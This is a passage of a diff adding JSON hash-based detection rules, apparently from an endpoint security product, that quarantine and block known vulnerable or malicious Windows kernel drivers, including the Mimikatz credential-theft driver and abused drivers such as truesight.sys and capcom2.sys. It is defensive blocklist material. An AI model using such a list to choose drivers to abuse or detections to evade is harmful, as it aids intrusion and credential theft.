"references": [], + "type": "hash", + "value": "a66f87966ea5c045dbd41ba4452679c01559f4e2e2fcd8a1c4552aff5be09f46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b33e6c62-564a-5b5f-8e88-ca9a06c79c75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821263Z", + "creation_date": "2026-03-23T11:45:31.821266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821274Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "198226366d49b62e0eb464096d64e40ad822f6c7f66f82249f69a17cdbcdb665", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b34738af-593f-536a-95d5-6e3fa11ef2e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967711Z", + "creation_date": "2026-03-23T11:45:29.967713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "004c319b601312c834fe86ae7c292621dee80bc47609deba70d8ae7eaf499b72", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b34ea632-95ba-561d-a2f7-3a3b6a78fc06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493365Z", + "creation_date": "2026-03-23T11:45:31.493367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f44a9d08cb5f0b9f212269d11899367abf2c6cb8eb3400d1abcacc47c065327e", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b35120d1-0066-53d6-b442-70a69d36fabd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150924Z", + "creation_date": "2026-03-23T11:45:31.150926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdba77fac50a18117cb65f9b14c9b1ebdf361eb93cc6df75bdb45bd6b0a8e9f5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b35d85a3-22c9-5f84-b2e5-6fc2f03384f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970428Z", + "creation_date": "2026-03-23T11:45:29.970431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b36029ac-e6e9-53ba-9495-85a7b363205a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490765Z", + "creation_date": "2026-03-23T11:45:31.490767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9cbc2c3b1d3ff3e8b70534ad2baff4b7266312a9a709f83114c5617bcb10f0d2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b3a88402-ae3a-5203-9618-b68a109f2aa1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487926Z", + "creation_date": "2026-03-23T11:45:31.487928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "464c021854994a4e3d5461eb3da298d8edab04d16854abff5561ed2f236eb1a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3ac668e-cce2-56b3-a97e-c9b3f4834655", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615014Z", + "creation_date": "2026-03-23T11:45:29.615016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.615021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3b1d786-6268-54ae-9c3b-8ff7d994b1fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812979Z", + "creation_date": "2026-03-23T11:45:31.812982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b3cca7fc8463525f0562af040ed47b86acdb24d4ea4380af9bd882d3bcc2cff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3b9e38e-0dd9-5805-b7a6-dc1f17e0e4b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980357Z", + "creation_date": "2026-03-23T11:45:29.980359Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980366Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ed0c00920ce76e832701d45117ed00b12e20588cb6fe8039fbccdfef9841047", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3b9f43f-beea-52ca-8525-b8a3814963e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821190Z", + "creation_date": "2026-03-23T11:45:30.821193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821202Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8781589c77df2330a0085866a455d3ef64e4771eb574a211849784fdfa765040", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3bd14e7-55ba-5eeb-8f6f-d28cdf6ceb33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608387Z", + "creation_date": "2026-03-23T11:45:29.608389Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608394Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c088bd8a06904ec62d40f0f1ae9dc5361472a76238a8458090202e057b983945", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3be3be9-2da7-50c7-88bc-fda3c070fe2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818082Z", + "creation_date": "2026-03-23T11:45:31.818085Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3485174d70a7be1357dcca39b49ec9a9e841a269de4dbcb30b58207a48e7519a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3c2267a-1bf8-5cdc-a822-3d50c219fc72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472154Z", + "creation_date": "2026-03-23T11:45:30.472157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3301b49b813427fa37a719988fe6446c6f4468dfe15aa246bec8d397f62f6486", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3c503cb-fb5b-524b-a386-73dce7bfd7e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147311Z", + "creation_date": "2026-03-23T11:45:31.147314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5cb7aafa4b6b04009f8febe155ecef8213cc65a1a09cb84c30cf2e458a43e4e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3ce25d9-dd31-565b-90ff-bbc1e1212796", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822220Z", + "creation_date": "2026-03-23T11:45:31.822222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4b349c3be07ad3e3c05a965ee83c9a7bcff6218784cec0ac16fc124360bb276", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3d3a493-8af8-5618-a1ba-11bd27fb8340", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457748Z", + "creation_date": "2026-03-23T11:45:30.457751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6621fb2e761237d2b09863fd31951789697f119d118d2e5db0e957ab0173f06a", + "comment": "Vulnerable Kernel Driver (aka capcom2.sys) [https://www.loldrivers.io/drivers/45c42e32-6261-43c1-bdbd-cab58da729d8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3d8cffe-da3e-5750-ae0a-e446a05cb598", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145972Z", + "creation_date": "2026-03-23T11:45:32.145974Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145980Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4f0357629e12ff599ad2f0179ac0f4eaec35044b7498037c2d91282dff9e592", + "comment": "Vulnerable Kernel Driver (aka TSDRVX64.sys) [https://www.loldrivers.io/drivers/424a387e-735e-49d1-99de-f067dcf1c3e9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3e20df8-1e92-583a-8fb2-c6b5d0638b86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149318Z", + "creation_date": "2026-03-23T11:45:31.149320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", 
+ "value": "dd7f1a8914e0da98219283e6ce217c74e55329e3dd97725ee275b6e468db799e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3e59e92-9713-5db9-a2a9-7c853e36e980", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463811Z", + "creation_date": "2026-03-23T11:45:30.463814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3fbec4c-b570-57ac-9935-92715b33819d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978544Z", + "creation_date": "2026-03-23T11:45:29.978546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1d3963c55c7ffa96d16e47ec4bbb4e171f828650ce853eb0b83c90ae9c6265a", + "comment": "Vulnerable Kernel Driver (aka AMDPowerProfiler.sys) [https://www.loldrivers.io/drivers/9a4fb66e-9084-4b21-9d76-a7afbe330606/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3ffc1bb-0dce-558a-8d3b-9067ff7f6b10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488448Z", + "creation_date": "2026-03-23T11:45:31.488450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e418608e2f1881ab7a46eb0a5eeae8620f01fbb5f9fd7f77cc58f1856a11e217", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b4058d16-20fe-5339-8e67-6fb9c52b49ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978084Z", + "creation_date": "2026-03-23T11:45:29.978086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59177fb7a0b11837368af1cc115f0d011ea19551070bd153795204ae1bd12e52", + "comment": "Malicious Kernel Driver (aka ntbios_2.sys) [https://www.loldrivers.io/drivers/33a9c9ae-5ca3-442d-9f0f-2615637c1c57/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b405ebf8-f6b7-57e1-9d26-1d94adfc7b09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492825Z", + "creation_date": "2026-03-23T11:45:31.492828Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5737c2db59cb518d8044183fcb75b47c7d238c37cb9ba765b05fc4e1ca2b0829", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b41345cf-b173-5227-b281-571a5a7e7307", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 